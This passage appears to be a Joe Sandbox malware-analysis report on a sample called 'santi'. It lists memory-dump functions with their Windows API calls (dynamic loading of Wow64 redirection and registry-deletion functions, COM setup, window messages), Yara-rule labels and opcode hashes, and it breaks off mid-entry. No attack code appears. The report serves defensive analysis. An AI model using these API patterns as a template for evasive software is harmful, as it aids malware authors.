                                                                Function 0034A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0034A46D
                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0034A482
                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0034A48F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: msctls_trackbar32
                                                                • API String ID: 3850602802-1010561917
                                                                • Opcode ID: c829f4256c5c6301305ec9bbf2cdcb530775e9b7fd83ecf350f13acafd629e7e
                                                                • Instruction ID: d174980f8fd9351e0fcade567840dcdd7a8f51814a522df0877b54dd4fa8f14f
                                                                • Opcode Fuzzy Hash: c829f4256c5c6301305ec9bbf2cdcb530775e9b7fd83ecf350f13acafd629e7e
                                                                • Instruction Fuzzy Hash: CA11E771240208BEEF225F65CC4AFAB37ADEF89754F024118FA459A291D6B2E811CB20
                                                                Function 00302287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00302350,?), ref: 003022A1
                                                                • GetProcAddress.KERNEL32(00000000), ref: 003022A8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: RoInitialize$combase.dll
                                                                • API String ID: 2574300362-340411864
                                                                • Opcode ID: c4991707038256eb066efbc08009e955705f510a7febe459d2556c8a85a44c4c
                                                                • Instruction ID: 34aae42a54a7c48b904fd0823a11d9af7d9747e1bbf5b1f993be81d90111f477
                                                                • Opcode Fuzzy Hash: c4991707038256eb066efbc08009e955705f510a7febe459d2556c8a85a44c4c
                                                                • Instruction Fuzzy Hash: 65E01A78A94300ABDB935FB1EC4DB95366CAB02702F108420F102D51E0CBF54041EF05
                                                                Function 0030235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00302276), ref: 00302376
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0030237D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: RoUninitialize$combase.dll
                                                                • API String ID: 2574300362-2819208100
                                                                • Opcode ID: ca075a36ddc3d18a4f0ca4bb22385e2849db0e39d1e80dcd6a10f33dfa4444d7
                                                                • Instruction ID: 00470eb95291fcb80f81821a3ec0aa0ecee8e730e46d050f69c18f9f34933ee6
                                                                • Opcode Fuzzy Hash: ca075a36ddc3d18a4f0ca4bb22385e2849db0e39d1e80dcd6a10f33dfa4444d7
                                                                • Instruction Fuzzy Hash: 6EE0ECB8B49300AFDB275F61ED1DB953A6CB725702F114454F10AD61F4CBFA5410DB14
                                                                Function 0035AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LocalTime__swprintf
                                                                • String ID: %.3d$WIN_XPe
                                                                • API String ID: 2070861257-2409531811
                                                                • Opcode ID: 6963781d925b90c7ebc5d10ccee53e0ecb0affed8936d55909facefab2237147
                                                                • Instruction ID: 92d4aaa636c9492320f39837c4568db25c7cbba205ecf051e0c71735b0270d1c
                                                                • Opcode Fuzzy Hash: 6963781d925b90c7ebc5d10ccee53e0ecb0affed8936d55909facefab2237147
                                                                • Instruction Fuzzy Hash: A3E01271804A1CDBCB139790CD05DF9B3BCA704B42F504592FD06E1420E7759B98BA22
                                                                Function 00342205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,003421FB,?,003423EF), ref: 00342213
                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00342225
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetProcessId$kernel32.dll
                                                                • API String ID: 2574300362-399901964
                                                                • Opcode ID: 38a71c4514bf2836734918436c369ecc1f645c2d2fa028114e1a6c84fcba07ed
                                                                • Instruction ID: c38c72996ffeefe204195d400ee669a25c6baa99a72ede587c9a18a62e8437a3
                                                                • Opcode Fuzzy Hash: 38a71c4514bf2836734918436c369ecc1f645c2d2fa028114e1a6c84fcba07ed
                                                                • Instruction Fuzzy Hash: 33D0A734D007169FCBA34F71F80864377D8EB0A300F018819F842F2150D7F0E880C660
                                                                Function 002E42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,002E42EC,?,002E42AA,?), ref: 002E4304
                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002E4316
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                • API String ID: 2574300362-1355242751
                                                                • Opcode ID: 19f5865c7f476b8f4330cf4c79f7038ba7f48aa54588cc62d06f18a8ec9796d5
                                                                • Instruction ID: e9adc1c0707631243057a0951ef7daac519a8513a85eb9680edd5170687e1e73
                                                                • Opcode Fuzzy Hash: 19f5865c7f476b8f4330cf4c79f7038ba7f48aa54588cc62d06f18a8ec9796d5
                                                                • Instruction Fuzzy Hash: 5ED0A774D54B13AFCB625F22E80C74277D8AB05301F108459E442D2264D7F0C8808620
                                                                Function 002E434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,002E41BB,002E4341,?,002E422F,?,002E41BB,?,?,?,?,002E39FE,?,00000001), ref: 002E4359
                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002E436B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                • API String ID: 2574300362-3689287502
                                                                • Opcode ID: e4274fcc25a2d9a536e9d9663a86d36ce1a2f0bacd5a7608834361d1ecf78945
                                                                • Instruction ID: a2af1770eba6d0f061112d47f54f7e46e5e89f8acdda70339f642787357ec48b
                                                                • Opcode Fuzzy Hash: e4274fcc25a2d9a536e9d9663a86d36ce1a2f0bacd5a7608834361d1ecf78945
                                                                • Instruction Fuzzy Hash: DBD0A770D50713AFCB225F33E80CB4377D8AB11715F108559E482D2150D7F0D8808610
                                                                Function 00320539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,0032051D,?,003205FE), ref: 00320547
                                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00320559
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                • API String ID: 2574300362-1071820185
                                                                • Opcode ID: 4835462c78565b947c0b82f116fc74e5ebbde5a349c90ac5ffc90a99d41eed2f
                                                                • Instruction ID: dea1cc847f7b0c674d2873c5aac13daa1474c94cfe7c45fe2a89ed8513acdac3
                                                                • Opcode Fuzzy Hash: 4835462c78565b947c0b82f116fc74e5ebbde5a349c90ac5ffc90a99d41eed2f
                                                                • Instruction Fuzzy Hash: 5ED0A730904B22AFCB228F22F80864676E8AB02301F21C41DE447D2151D6F0CC848A50
                                                                Function 00320564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0032052F,?,003206D7), ref: 00320572
                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00320584
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                • API String ID: 2574300362-1587604923
                                                                • Opcode ID: 9cffb1ae5d9722666a35999ce3e1e275674f50cab49ab430ab3e444b27c3e6c0
                                                                • Instruction ID: d72591340344a7eb81b9bc2f3414e0f3878e8eaeb8f813b672fe81d5c60a9ef2
                                                                • Opcode Fuzzy Hash: 9cffb1ae5d9722666a35999ce3e1e275674f50cab49ab430ab3e444b27c3e6c0
                                                                • Instruction Fuzzy Hash: 84D05E30904B22AACB225F25B848A4277E8AF06300F218519E84692150D7F0C4C48A20
                                                                Function 0033ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0033ECBE,?,0033EBBB), ref: 0033ECD6
                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0033ECE8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                • API String ID: 2574300362-1816364905
                                                                • Opcode ID: 1e2a82c7a419aea38b2bcd615dec5d6df6b6edce1ddfc47f8f5f2fb2ecbb61bf
                                                                • Instruction ID: 857492faf7327308c916d7f907b9401234f941aaf770413407fb43fd523c595d
                                                                • Opcode Fuzzy Hash: 1e2a82c7a419aea38b2bcd615dec5d6df6b6edce1ddfc47f8f5f2fb2ecbb61bf
                                                                • Instruction Fuzzy Hash: 65D0A730D00723AFCF235F61E88864676E8AB01700F01C519F846D2194DBF0C8818710
                                                                Function 0033BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0033BAD3,00000001,0033B6EE,?,0037DC00), ref: 0033BAEB
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0033BAFD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                • API String ID: 2574300362-199464113
                                                                • Opcode ID: d5003879f38ce3458d20096de51dccb62ab6179c3d24289b892b65a2d4b6e49d
                                                                • Instruction ID: d850934ae34b191459cd2069bbb1c440acf65a5d8341d1a93ac8154a049591db
                                                                • Opcode Fuzzy Hash: d5003879f38ce3458d20096de51dccb62ab6179c3d24289b892b65a2d4b6e49d
                                                                • Instruction Fuzzy Hash: A0D0A730D047139FCB335F21E888B52F6D8AB01304F018419E943D2254DBF4C880C610
                                                                Function 00343BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00343BD1,?,00343E06), ref: 00343BE9
                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00343BFB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                • API String ID: 2574300362-4033151799
                                                                • Opcode ID: de275b53e0ba42429a463231db3c0ccd696f1daadb453913a4d7c3bbd30ee6a4
                                                                • Instruction ID: d5b9e37c928f82ea239beb7ce93df505bf8c2780a9189adcb2f71da3434eecf2
                                                                • Opcode Fuzzy Hash: de275b53e0ba42429a463231db3c0ccd696f1daadb453913a4d7c3bbd30ee6a4
                                                                • Instruction Fuzzy Hash: 22D0A7B0A007129FDB225FA1E848A83BAFCAB02314F218419E446E3150D6F0DC808F10
                                                                Function 00319B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dfe8eb899833e0d557f420febd3b6d2285ce0acab2d8cb810768efaa9bbda0e3
                                                                • Instruction ID: 981b5936e8578837a7c4b3bdcac8f37f49ed92daa0cafb134ae6ce040e214b50
                                                                • Opcode Fuzzy Hash: dfe8eb899833e0d557f420febd3b6d2285ce0acab2d8cb810768efaa9bbda0e3
                                                                • Instruction Fuzzy Hash: 19C15B75A0021AEFCB19DF94C894BEEB7B9FF48700F118599E905AB251D730DE81DBA0
                                                                Function 0033AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0033AAB4
                                                                • CoUninitialize.OLE32 ref: 0033AABF
                                                                  • Part of subcall function 00320213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0032027B
                                                                • VariantInit.OLEAUT32(?), ref: 0033AACA
                                                                • VariantClear.OLEAUT32(?), ref: 0033AD9D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                • String ID:
                                                                • API String ID: 780911581-0
                                                                • Opcode ID: df8e3dd973e8af8a625c6e82fd40fa3542b1f9cebb8331490223b203bf88446a
                                                                • Instruction ID: 04da7c9d5fe1218b004d70d4b47707d6076e577b8b1d5757823947ac45aa50ee
                                                                • Opcode Fuzzy Hash: df8e3dd973e8af8a625c6e82fd40fa3542b1f9cebb8331490223b203bf88446a
                                                                • Instruction Fuzzy Hash: 10A15A35214B019FCB12EF15C491B1AB7E8BF88710F158459FA9A9B3A2CB30ED54CF86
                                                                Function 003191CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$AllocClearCopyInitString
                                                                • String ID:
                                                                • API String ID: 2808897238-0
                                                                • Opcode ID: 80409aa3bcaf015615559e334b475dd6bfbe045feb6edef0406982c2efff5e94
                                                                • Instruction ID: 1291d0c7544143ae9222ee850837f2d32b48c926b1903fca703816d0a425df29
                                                                • Opcode Fuzzy Hash: 80409aa3bcaf015615559e334b475dd6bfbe045feb6edef0406982c2efff5e94
                                                                • Instruction Fuzzy Hash: DA51B8346103069BDB299F66D4A17AEB3E9EF4C310F249C1FE556CB6D1DB7098C09B11
                                                                Function 0030365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                • String ID:
                                                                • API String ID: 3877424927-0
                                                                • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                • Instruction ID: ccd2632ac8a5adb8924cc094d2d1d9f298cad40dca47c8ad889e4171810a9c53
                                                                • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                • Instruction Fuzzy Hash: DC51E9B0A02309ABDB268F69C8A466E77BDEF40720F258729F835876D0D7719F50CB40
                                                                Function 0034C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowRect.USER32(00DF66B8,?), ref: 0034C544
                                                                • ScreenToClient.USER32(?,00000002), ref: 0034C574
                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0034C5DA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ClientMoveRectScreen
                                                                • String ID:
                                                                • API String ID: 3880355969-0
                                                                • Opcode ID: 8753af364bd409e54c417b3b59978a6c20931561b34ea5dcc89a931c1448f6a9
